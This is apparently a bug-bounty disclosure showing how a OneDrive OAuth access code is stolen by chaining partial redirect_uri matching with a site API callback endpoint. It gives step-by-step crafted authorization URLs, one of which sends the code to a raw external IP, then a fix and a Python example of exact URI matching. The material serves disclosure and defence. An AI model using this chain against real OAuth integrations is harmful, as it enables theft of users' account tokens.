Stealing the Access Token of a OneDrive Integration by Chaining a CSRF Vulnerability
Severity: High
Complexity: Easy
Weakness: partial OAuth redirect_uri path matching
Steps to Reproduce:
1. The site has a third-party integrations tab at site.com/integrations, which includes a OneDrive integration.
2. Click Activate on the OneDrive integration.
3. We get redirected to:
https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/account/skydriveOAuthCallback&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access
From Above URL:
redirect_uri=https://www.site.com/account/skydriveOAuthCallback
4. So I started playing with redirect_uri=
I found that redirect_uri accepts anything after
redirect_uri=https://www.site.com/account/xxxxxxxxxx
5. This confirms that they haven't used a strict path match on redirect_uri, allowing anything after redirect_uri=https://www.site.com/account/*
https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/xxxxxxxxxxx&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access
6. So now the possible way to exploit this to get the access token is by finding an open redirect vulnerability. I kept looking for open redirect endpoints on site.com to exploit, but had no luck.
7. The next day I started reading their API documentation.
And I came across:
GET /api/testCallback?callback_url=http://yoursite.com
which they use for checking API callback requests to your server.
8. So finally we have a CSRF vulnerability that makes a GET request to the attacker's server.
&redirect_uri=https://www.site.com/api/testCallback?callback_url=http://52.66.158.189/?
Finally:
https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/api/testCallback?callback_url=http://52.66.158.189/?&scope=wl.basic+wl.skydrive+wl.skydrive_update+wl.offline_access
~ Success ~
Fix: exact matches should be enforced on redirect_uri instead of partial (prefix) matches.
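To make the fix concrete, here is an added example (not code from the report or the affected site) that contrasts the prefix-style check the report observed with a strict, component-wise comparison of the registered callback URI; the registered URI is the one shown above, and the "attacker.example" host is a constructed placeholder for the callback_url target.

```python
"""Prefix vs. exact redirect_uri matching, modelled on the flaw in this report.

Added example, not the site's or Microsoft's code. REGISTERED is the callback
from step 3; the other URIs reconstruct steps 4 and 8 with a placeholder host.
"""
from urllib.parse import urlsplit

REGISTERED = "https://www.site.com/account/skydriveOAuthCallback"

def prefix_match(registered: str, supplied: str) -> bool:
    """Weak check: passes any URI that merely starts with the registered origin.
    This is the behaviour the report observed (anything under site.com/ passed)."""
    r = urlsplit(registered)
    return supplied.startswith(f"{r.scheme}://{r.netloc}/")

def exact_match(registered: str, supplied: str) -> bool:
    """Strict check: scheme, host:port and path must be identical, the scheme
    must be https, and the supplied URI may carry no query or fragment."""
    r, s = urlsplit(registered), urlsplit(supplied)
    return (
        s.scheme == r.scheme == "https"
        and s.netloc.lower() == r.netloc.lower()
        and s.path == r.path
        and s.query == ""
        and s.fragment == ""
    )

def evaluate(supplied: str) -> dict:
    """Return both verdicts so the difference is visible side by side."""
    return {"prefix": prefix_match(REGISTERED, supplied),
            "exact": exact_match(REGISTERED, supplied)}

# Constructed inputs mirroring the report's steps.
LEGIT = REGISTERED
PROBE = "https://www.site.com/account/xxxxxxxxxx"                               # step 4
CHAINED = "https://www.site.com/api/testCallback?callback_url=http://attacker.example/?"  # step 8
DOWNGRADE = "http://www.site.com/account/skydriveOAuthCallback"                 # https -> http

if __name__ == "__main__":
    for label, uri in [("legit", LEGIT), ("probe", PROBE),
                       ("chained", CHAINED), ("downgrade", DOWNGRADE)]:
        v = evaluate(uri)
        print(f"{label:9} prefix={v['prefix']!s:5} exact={v['exact']}")
```

Only the registered URI survives the exact check; the step-4 probe, the chained testCallback URI and the scheme downgrade are all rejected, while the prefix check lets the first two through.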